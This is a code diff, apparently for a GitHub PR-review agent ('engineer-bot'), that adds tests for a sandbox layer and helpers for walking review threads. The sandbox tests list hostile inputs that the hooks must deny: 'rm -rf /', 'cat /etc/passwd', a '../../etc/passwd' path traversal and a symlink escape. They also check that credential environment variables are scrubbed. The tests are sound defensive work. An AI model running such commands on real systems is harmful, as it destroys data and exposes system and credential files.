+    assert sdk_security._resolve_inside(tmp_path, denied, "driver/secret.cs") is None
+    assert sdk_security._resolve_inside(tmp_path, denied, "tests/ok.cs") is not None
+
+
+def test_denied_subpath_exact_file(tmp_path):
+    """A file entry in denied_subpaths denies exactly that file
+    (is_relative_to is True for equal paths)."""
+    denied = (tmp_path / ".gitleaksignore",)
+    assert sdk_security._resolve_inside(tmp_path, denied, ".gitleaksignore") is None
+    assert sdk_security._resolve_inside(tmp_path, denied, "other") is not None
+
+
+def test_symlink_escape_denied(tmp_path):
+    outside = tmp_path.parent / "outside_target"
+    outside.mkdir(exist_ok=True)
+    link = tmp_path / "link"
+    link.symlink_to(outside)
+    # resolve() follows the symlink; the target is outside the root.
+    assert sdk_security._resolve_inside(tmp_path, (), "link/file.txt") is None
+
+
+# ── bash argv allowlist ──
+
+_ALLOW = (("dotnet", "build"), ("dotnet", "test"), ("git", "diff", "HEAD"))
+
+
+def test_bash_allowed_prefix():
+    assert sdk_security.bash_command_allowed("dotnet build MyProj.csproj", _ALLOW)
+    assert sdk_security.bash_command_allowed("git diff HEAD", _ALLOW)
+
+
+def test_bash_denied_not_in_list():
+    assert not sdk_security.bash_command_allowed("cat /etc/passwd", _ALLOW)
+    assert not sdk_security.bash_command_allowed("ls -la", _ALLOW)
+
+
+def test_bash_denied_subcommand_mismatch():
+    """('dotnet','build') must NOT permit `dotnet tool install`."""
+    assert not sdk_security.bash_command_allowed("dotnet tool install -g evil", _ALLOW)
+
+
+def test_bash_empty_and_unparseable_denied():
+    assert not sdk_security.bash_command_allowed("", _ALLOW)
+    assert not sdk_security.bash_command_allowed('git diff "unterminated', _ALLOW)
+
+
+# ── env scrub (delegates to env_scrub.scrub, verbatim table) ──
+
+def test_scrub_strips_credentials():
+    src = {
+        "DATABRICKS_TOKEN": "secret",
+        "GITHUB_APP_PRIVATE_KEY": "k",
+        "MY_API_KEY": "k",
+        "AWS_ACCESS_KEY_ID": "k",
+        "SOME_PASSWORD": "p",
+    }
+    out = sdk_security.scrubbed_env(src)
+    assert out == {}
+
+
+def test_scrub_keeps_non_credential_config():
+    """The deliberate no-blanket-prefix rule: DATABRICKS_TEST_CONFIG_FILE
+    must survive (the bash tool's dotnet-test invocation needs it)."""
+    src = {
+        "DATABRICKS_TEST_CONFIG_FILE": "/cfg.json",
+        "DATABRICKS_TOKEN": "secret",
+        "PATH": "/usr/bin",
+    }
+    out = sdk_security.scrubbed_env(src)
+    assert out == {"DATABRICKS_TEST_CONFIG_FILE": "/cfg.json", "PATH": "/usr/bin"}
+
+
+# ── async hook smoke (logic only; no SDK runtime required) ──
+
+def test_safe_path_hook_denies_escape(tmp_path):
+    hook = sdk_security.make_safe_path_hook(tmp_path, ())
+    out = asyncio.run(hook(
+        {"tool_name": "Read", "tool_input": {"file_path": "../../etc/passwd"}},
+        "tid", None,
+    ))
+    assert out["hookSpecificOutput"]["permissionDecision"] == "deny"
+
+
+def test_safe_path_hook_allows_inside(tmp_path):
+    hook = sdk_security.make_safe_path_hook(tmp_path, ())
+    out = asyncio.run(hook(
+        {"tool_name": "Read", "tool_input": {"file_path": "tests/a.cs"}},
+        "tid", None,
+    ))
+    assert out == {}  # empty == allow
+
+
+def test_bash_hook_denies_and_clamps(tmp_path):
+    hook = sdk_security.make_bash_allowlist_hook(_ALLOW, timeout=900)
+    denied = asyncio.run(hook(
+        {"tool_name": "Bash", "tool_input": {"command": "rm -rf /"}}, "tid", None,
+    ))
+    assert denied["hookSpecificOutput"]["permissionDecision"] == "deny"
+    allowed = asyncio.run(hook(
+        {"tool_name": "Bash", "tool_input": {"command": "dotnet build"}}, "tid", None,
+    ))
+    assert allowed["hookSpecificOutput"]["permissionDecision"] == "allow"
+    assert allowed["tool_input"]["timeout"] == 900 * 1000  # clamped to ms
+
+
+def test_can_use_tool_enforces_path_and_bash_for_mcp_names(tmp_path):
+    """make_can_use_tool must apply safe_path + bash allowlist to MCP-qualified
+    @tool names (mcp__engineer-tools__edit_file / __bash), not just built-ins.
+    (Review #445 [7]/[8])"""
+    cb = sdk_security.make_can_use_tool(
+        tmp_path, denied_subpaths=(), bash_allowlist=(("git", "status"),),
+        allowed_tool_names=("mcp__engineer-tools__edit_file", "mcp__engineer-tools__bash"),
+    )
+    deny = asyncio.run(cb("mcp__engineer-tools__edit_file", {"path": "../../etc/passwd"}, None))
+    assert deny["behavior"] == "deny"
+    allow = asyncio.run(cb("mcp__engineer-tools__edit_file", {"path": "tests/a.cs"}, None))
+    assert allow["behavior"] == "allow"
+    bad_bash = asyncio.run(cb("mcp__engineer-tools__bash", {"cmd": "rm -rf /"}, None))
+    assert bad_bash["behavior"] == "deny"
+    ok_bash = asyncio.run(cb("mcp__engineer-tools__bash", {"cmd": "git status"}, None))
+    assert ok_bash["behavior"] == "allow"
diff --git a/scripts/shared/tests/test_threads.py b/scripts/shared/tests/test_threads.py
new file mode 100644
index 000000000..3eff9b33f
--- /dev/null
+++ b/scripts/shared/tests/test_threads.py
@@ -0,0 +1,290 @@
+"""Tests for shared.threads — review-comment tree walking."""
+from __future__ import annotations
+
+from scripts.shared import threads
+
+
+def _c(cid: int, in_reply_to=None, body=""):
+    return {
+        "id": cid,
+        "in_reply_to_id": in_reply_to,
+        "body": body,
+        "created_at": f"2026-01-01T00:00:{cid:02d}Z",
+    }
+
+
+class TestFindRoot:
+    def test_single_comment_is_its_own_root(self):
+        assert threads.find_root([_c(1)], target_id=1)["id"] == 1
+
+    def test_two_level_reply_walks_to_root(self):
+        comments = [_c(1), _c(2, in_reply_to=1)]
+        assert threads.find_root(comments, target_id=2)["id"] == 1
+
+    def test_deep_chain_walks_to_root(self):
+        comments = [_c(1), _c(2, 1), _c(3, 2), _c(4, 3)]
+        assert threads.find_root(comments, target_id=4)["id"] == 1
+
+    def test_unknown_target_returns_none(self):
+        assert threads.find_root([_c(1)], target_id=99) is None
+
+    def test_cycle_does_not_infinite_loop(self):
+        comments = [_c(2, 3), _c(3, 2)]
+        assert threads.find_root(comments, target_id=2) is None
+
+
+class TestWalkThread:
+    def test_root_with_no_replies(self):
+        result = threads.walk_thread([_c(1)], root_id=1)
+        assert [c["id"] for c in result] == [1]
+
+    def test_root_with_two_direct_replies(self):
+        comments = [_c(1), _c(2, 1), _c(3, 1)]
+        assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2, 3]
+
+    def test_nested_replies_included(self):
+        comments = [_c(1), _c(2, 1), _c(3, 2), _c(4, 3)]
+        assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2, 3, 4]
+
+    def test_replies_are_chronological(self):
+        comments = [
+            _c(1),
+            {**_c(3, 1), "created_at": "2026-01-01T00:00:05Z"},
+            {**_c(2, 1), "created_at": "2026-01-01T00:00:10Z"},
+        ]
+        assert [c["id"] for c in threads.walk_thread(comments, 1)] == [1, 3, 2]
+
+    def test_other_thread_excluded(self):
+        comments = [_c(1), _c(2, 1), _c(10), _c(11, 10)]
+        assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2]
+
+
+def _c2(cid, *, in_reply_to=None, body="", user="alice", created_at=None):
+    return {
+        "id": cid,
+        "in_reply_to_id": in_reply_to,
+        "body": body,
+        "created_at": created_at or f"2026-01-01T00:00:{cid:02d}Z",
+        "user": {"login": user},
+    }
+
+
+def _is_eng_bot(c):
+    return "<!-- engineer-bot-csharp-coverage:v1" in (c.get("body") or "")
+
+
+class TestFindUnaddressedThreads:
+    def test_empty_input(self):
+        assert threads.find_unaddressed_threads(
+            [],
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        ) == []
+
+    def test_fresh_thread_with_no_bot_reply_is_returned(self):
+        comments = [_c2(1, user="peco-review-bot[bot]", body="finding")]
+        result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert len(result) == 1
+        assert [c["id"] for c in result[0]] == [1]
+
+    def test_thread_with_bot_reply_and_no_newer_human_is_skipped(self):
+        comments = [
+            _c2(1, user="peco-review-bot[bot]", body="finding",
+                created_at="2026-01-01T00:00:01Z"),
+            _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="fixed\n<!-- engineer-bot-csharp-coverage:v1 followup action=fix -->",
+                created_at="2026-01-01T00:00:02Z"),
+        ]
+        assert threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        ) == []
+
+    def test_reviewer_replies_after_bot_reopens_thread(self):
+        comments = [
+            _c2(1, user="peco-review-bot[bot]", body="finding",
+                created_at="2026-01-01T00:00:01Z"),
+            _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="fixed\n<!-- engineer-bot-csharp-coverage:v1 followup action=fix -->",
+                created_at="2026-01-01T00:00:02Z"),
+            _c2(3, in_reply_to=2, user="eric",
+                body="not quite — also need X",
+                created_at="2026-01-01T00:00:03Z"),
+        ]
+        result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert len(result) == 1
+        assert [c["id"] for c in result[0]] == [1, 2, 3]
+
+    def test_thread_at_cap_is_skipped_even_with_newer_human_reply(self):
+        comments = [
+            _c2(1, user="peco-review-bot[bot]",
+                created_at="2026-01-01T00:00:01Z"),
+            _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="r1\n<!-- engineer-bot-csharp-coverage:v1 -->",
+                created_at="2026-01-01T00:00:02Z"),
+            _c2(3, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="r2\n<!-- engineer-bot-csharp-coverage:v1 -->",
+                created_at="2026-01-01T00:00:03Z"),
+            _c2(4, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="r3\n<!-- engineer-bot-csharp-coverage:v1 -->",
+                created_at="2026-01-01T00:00:04Z"),
+            _c2(5, in_reply_to=1, user="eric", body="keep going",
+                created_at="2026-01-01T00:00:05Z"),
+        ]
+        assert threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        ) == []
+
+    def test_thread_whose_root_is_engineer_bot_is_skipped(self):
+        comments = [
+            _c2(1, user="peco-engineer-bot[bot]",
+                body="engineer-bot-opened review thread (defense in depth)"),
+            _c2(2, in_reply_to=1, user="peco-review-bot[bot]", body="reply"),
+        ]
+        assert threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        ) == []
+
+    def test_multiple_threads_returned_oldest_first(self):
+        comments = [
+            _c2(10, user="peco-review-bot[bot]", body="finding A",
+                created_at="2026-01-01T10:00:00Z"),
+            _c2(20, user="peco-review-bot[bot]", body="finding B",
+                created_at="2026-01-01T09:00:00Z"),
+            _c2(30, user="Copilot", body="finding C",
+                created_at="2026-01-01T11:00:00Z"),
+        ]
+        result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert [t[0]["id"] for t in result] == [20, 10, 30]
+
+    def test_thread_unrelated_to_bot_marker_is_returned(self):
+        """A human reviewer's thread (no bot involvement) is just as
+        unaddressed as a peco-review-bot one — engineer-bot reacts to
+        all reviewers, not only bot reviewers."""
+        comments = [_c2(1, user="alice", body="please refactor X")]
+        result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert len(result) == 1
+        assert result[0][0]["id"] == 1
+
+    def test_thread_with_only_bot_markered_comments_is_skipped(self):
+        """If every comment in a thread carries the bot marker (e.g.
+        a non-bot login posted text that quotes one of the bot's prior
+        marker strings), there's no actual reviewer ask. The explicit
+        non-bot guard skips this rather than relying on `""` vs ISO
+        timestamp string ordering working out to False by accident."""
+        comments = [
+            _c2(1, user="alice",
+                body="reposted: <!-- engineer-bot-csharp-coverage:v1 -->",
+                created_at="2026-01-01T00:00:01Z"),
+        ]
+        # is_bot_reply matches on marker → the only comment is a bot
+        # reply by predicate → no non-bot comments → skip.
+        assert threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        ) == []
+
+    def test_same_second_timestamps_tiebreak_by_id(self):
+        """Burst review: bot replies and reviewer posts in the same
+        second. ISO timestamps tie; the later GitHub comment ID is
+        the later comment. Re-engagement should fire on the reviewer
+        reply even when `created_at` strings are equal."""
+        comments = [
+            _c2(1, user="peco-review-bot[bot]", body="finding",
+                created_at="2026-01-01T00:00:00Z"),
+            _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="fix\n<!-- engineer-bot-csharp-coverage:v1 -->",
+                created_at="2026-01-01T00:00:05Z"),
+            _c2(3, in_reply_to=2, user="eric",
+                body="not quite",
+                created_at="2026-01-01T00:00:05Z"),
+        ]
+        result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_is_eng_bot,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert len(result) == 1, "id=3 reply (same second, later id) should re-open"
+
+    def test_is_bot_authored_excludes_error_replies_from_non_bot(self):
+        """If `is_bot_reply` excludes \`action=error\` replies (the
+        engineer-bot pattern) but we use it for BOTH cap-counting AND
+        the non_bot timestamp comparison, an error reply gets treated
+        as a fresh reviewer ask and the bot re-engages on its own
+        crash notice. The separate `is_bot_authored` predicate fixes
+        this — it matches error replies too, so they don't appear
+        in `non_bot`."""
+        # Eng-bot predicates that mimic the production pattern:
+        # `_is_bot_reply` excludes action=error; `_is_bot_authored`
+        # includes it.
+        def _eng_authored(c):
+            return "<!-- engineer-bot-csharp-coverage:v1" in (c.get("body") or "")
+        def _eng_reply(c):
+            if not _eng_authored(c):
+                return False
+            return "action=error" not in (c.get("body") or "")
+
+        comments = [
+            _c2(1, user="peco-review-bot[bot]", body="finding",
+                created_at="2026-01-01T00:00:01Z"),
+            _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]",
+                body="fixed\n<!-- engineer-bot-csharp-coverage:v1 followup action=fix -->",
+                created_at="2026-01-01T00:00:02Z"),
+            _c2(3, in_reply_to=2, user="peco-engineer-bot[bot]",
+                body="crashed\n<!-- engineer-bot-csharp-coverage:v1 followup action=error -->",
+                created_at="2026-01-01T00:00:03Z"),
+        ]
+        # Without passing is_bot_authored, the bug WOULD show: the
+        # error reply at id=3 is classified as non_bot (per
+        # _eng_reply) — its timestamp is the latest of any non-bot
+        # comment — so non_bot_time > bot_time and the thread
+        # re-opens on the bot's own crash.
+        bug_result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_eng_reply,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert len(bug_result) == 1, "demonstrates the bug — wrong re-engage"
+        # With is_bot_authored, the error reply is correctly classified
+        # as bot-authored → not in non_bot → thread stays skipped.
+        fixed_result = threads.find_unaddressed_threads(
+            comments,
+            is_bot_reply=_eng_reply,
+            is_bot_authored=_eng_authored,
+            bot_login_prefix="peco-engineer-bot",
+            max_replies_per_thread=3,
+        )
+        assert fixed_result == [], "fixed — error reply is bot-authored, no re-engage"
diff --git a/scripts/shared/threads.py b/scripts/shared/threads.py
new file mode 100644
index 000000000..02e8d5488
--- /dev/null
+++ b/scripts/shared/threads.py
@@ -0,0 +1,150 @@
+"""Pure tree-walking helpers for GitHub PR review comments.
+
+Network I/O is the caller's responsibility — pass the list of comment
+dicts in. Each comment dict must have `id`, `in_reply_to_id` (None for
+roots), `body`, `created_at`. The shape matches what `gh api
+.../pulls/N/comments` returns.
+"""
+from __future__ import annotations
+
+from typing import Any, Callable, Optional
+
+
+def find_root(comments: list[dict[str, Any]], target_id: int) -> Optional[dict[str, Any]]:
+    by_id = {c["id"]: c for c in comments}
+    cur = by_id.get(target_id)
+    if cur is None:
+        return None
+    seen: set[int] = set()
+    while True:
+        if cur["id"] in seen:
+            return None
+        seen.add(cur["id"])
+        parent_id = cur.get("in_reply_to_id")
+        if parent_id is None or parent_id not in by_id:
+            return cur
+        cur = by_id[parent_id]
+
+
+def walk_thread(comments: list[dict[str, Any]], root_id: int) -> list[dict[str, Any]]:
+    by_id = {c["id"]: c for c in comments}
+    if root_id not in by_id:
+        return []
+    children: dict[int, list[int]] = {}
+    for c in comments:
+        parent = c.get("in_reply_to_id")
+        if parent is not None:
+            children.setdefault(parent, []).append(c["id"])
+
+    out: list[dict[str, Any]] = []
+    stack = [root_id]
+    seen: set[int] = set()
+    while stack:
+        cid = stack.pop()
+        if cid in seen:
+            continue
+        seen.add(cid)
+        out.append(by_id[cid])
+        stack.extend(children.get(cid, []))
+    out.sort(key=lambda c: c.get("created_at", ""))
+    return out
+
+
+def find_unaddressed_threads(
+    comments: list[dict[str, Any]],
+    *,
+    is_bot_reply: Callable[[dict[str, Any]], bool],
+    bot_login_prefix: str,
+    max_replies_per_thread: int,
+    is_bot_authored: Optional[Callable[[dict[str, Any]], bool]] = None,
+) -> list[list[dict[str, Any]]]:
+    """Return threads that engineer-bot still needs to engage with.
+
+    A thread is "unaddressed" when ALL of:
+      - Its root was NOT authored by engineer-bot (skip the bot's own
+        comments — defense in depth, today the bot never opens a
+        review thread).
+      - The total count of bot-replies in the thread is strictly less
+        than `max_replies_per_thread`. Bounds cross-bot ping-pong.
+      - There is NO prior bot reply, OR the latest non-bot comment is
+        newer than the latest bot reply. The second clause handles
+        "I replied; reviewer pushed back; I should look again."
+        Without it the bot would re-process every thread on every
+        run; with only "no prior bot reply" we'd never re-engage on
+        a contested thread.
+
+    Each returned element is the thread's comments in creation order
+    (matching `walk_thread`'s output). The list of threads is sorted
+    by root `created_at` so callers process oldest-first.
+
+    Args:
+      comments: full PR review-comment list (e.g. from
+        `github_ops.list_pr_review_comments`).
+      is_bot_reply: predicate returning True if a comment counts
+        toward `max_replies_per_thread`. Substantive bot replies
+        only — typically EXCLUDES infrastructure notices (e.g.
+        `action=error` crash replies) so transient crashes don't
+        consume the cap.
+      bot_login_prefix: prefix of engineer-bot's GitHub user login
+        (e.g. `"peco-engineer-bot"`). Threads whose ROOT login starts
+        with this prefix are skipped.
+      max_replies_per_thread: hard cap on bot replies per thread.
+      is_bot_authored: predicate returning True if a comment is from
+        the bot AT ALL (regardless of substantive vs infrastructure
+        kind). Used to identify the reviewer ask via the
+        "latest comment NOT from the bot" rule. When omitted,
+        defaults to `is_bot_reply` for back-compat. Engineer-bot
+        callers should pass a separate predicate that DOES match
+        error replies — an `action=error` reply is still "from the
+        bot," and treating it as a fresh reviewer ask causes
+        spurious re-engagement on transient crashes.
+    """
+    if is_bot_authored is None:
+        is_bot_authored = is_bot_reply
+    if not comments:
+        return []
+    roots: list[dict[str, Any]] = [
+        c for c in comments if c.get("in_reply_to_id") is None
+    ]
+    out: list[list[dict[str, Any]]] = []
+    for root in roots:
+        root_login = (root.get("user") or {}).get("login") or ""
+        if root_login.startswith(bot_login_prefix):
+            continue
+        thread = walk_thread(comments, root["id"])
+        if not thread:
+            continue
+        bot_replies = [c for c in thread if is_bot_reply(c)]
+        if len(bot_replies) >= max_replies_per_thread:
+            continue
+        if not bot_replies:
+            out.append(thread)
+            continue
+        # Re-engagement: latest non-bot comment AFTER latest bot reply.
+        # `non_bot` filters via `is_bot_authored` (not `is_bot_reply`)
+        # so an `action=error` reply that DOESN'T count toward the
+        # cap still counts as bot-authored — preventing the bot's own
+        # crash notice from being misclassified as a fresh reviewer
+        # ask.
+        non_bot = [c for c in thread if not is_bot_authored(c)]
+        if not non_bot:
+            # Every comment in the thread is bot-markered (e.g. root
+            # contains a marker substring quoted from review text, or
+            # a reviewer's comment was deleted). No reviewer ask to
+            # react to — skip explicitly rather than relying on
+            # empty-string ordering against an ISO timestamp.
+            continue
+        # Compare by (created_at, id) so threads with same-second
+        # timestamps (a real possibility during a multi-comment review
+        # burst) tie-break on monotonic GitHub comment IDs — the later
+        # ID is reliably the later comment. Strict `>` on ISO strings
+        # alone would skip a reviewer reply posted in the same second
+        # as the bot's reply ("not after, so stale").
+        def _key(c):
+            return (c.get("created_at", ""), c.get("id", 0))
+        latest_bot_key = max(_key(c) for c in bot_replies)
+        latest_non_bot_key = max(_key(c) for c in non_bot)
+        if latest_non_bot_key > latest_bot_key:
+            out.append(thread)
+    out.sort(key=lambda t: t[0].get("created_at", ""))
+    return out